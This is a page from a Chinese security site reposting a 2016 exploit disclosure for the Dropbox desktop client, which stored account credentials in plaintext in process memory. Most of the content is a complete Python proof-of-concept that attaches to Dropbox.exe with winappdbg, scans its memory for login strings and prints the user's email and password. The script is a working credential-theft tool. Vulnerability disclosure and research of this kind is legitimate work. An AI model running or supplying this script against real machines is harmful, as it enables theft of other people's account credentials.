首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure 来源：http://www.black-rose.ml 作者：Wizman 发布时间：2016-09-09   ##### # Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure # Tested on Windows Windows Server 2012 R2 64bit, English # Vendor Homepage @ https://www.dropbox.com # Date 06/09/2016 # Bug Discovery by: # # Yakir Wizman (https://www.linkedin.com/in/yakirwizman) # http://www.black-rose.ml # # Viktor Minin (https://www.linkedin.com/in/MininViktor) # https://1-33-7.com/ # # Alexander Korznikov (https://www.linkedin.com/in/nopernik) # http://korznikov.com/ # ##### # Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. # A potential attacker could reveal the supplied username and password in order to gain access to account. ##### # Proof-Of-Concept Code:   import time import urllib from winappdbg import Debug, Process   username    = '' password    = '' found       = 0 filename    = "Dropbox.exe" process_pid = 0 memory_dump = []   debug = Debug() try:     print "[~] Searching for pid by process name '%s'.." % (filename)     time.sleep(1)     debug.system.scan_processes()     for (process, process_name) in debug.system.find_processes_by_filename(filename):         process_pid = process.get_pid()     if process_pid is not 0:         print "[+] Found process with pid #%d" % (process_pid)         time.sleep(1)         print "[~] Trying to read memory for pid #%d" % (process_pid)                  process = Process(process_pid)         for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):             memory_dump.append(process.read(address,100))         for i in range(len(memory_dump)):             email_addr  = memory_dump[i].split('email=')[1]             tmp_passwd  = memory_dump[i].split('password=')[1]             username    = email_addr.split('\x00')[0]             password    = tmp_passwd.split('&is_sso_link=')[0]             if username != '' and password !='':                 found = 1                 print "[+] Credentials found!\r\n----------------------------------------"                 print "[+] Username: %s" % urllib.unquote_plus(username)                 print "[+] Password: %s" % password         if found == 0:             print "[-] Credentials not found! Make sure the client is connected."     else:         print "[-] No process found with name '%s'." % (filename)          debug.loop() finally:     debug.stop()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apache/mod_ssl OpenSSL < 0.9.6 ·LogMeIn Client 1.3.2462 (64bit ·Adobe ColdFusion < 11 Update 1 ·Apple iCloud Desktop Client 5. ·SugarCRM 6.5.23 - REST PHP Obj ·Zabbix 2.0 - 3.0.3 - SQL Injec ·TeamViewer 11.0.65452 (64 bit) ·Vodafone Mobile Wifi - Reset A ·Multiple Applications - Local ·LamaHub 0.0.6.2 - Buffer Overf ·WIN-911 7.17.00 - Multiple Vul ·glibc - getaddrinfo Stack Base   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved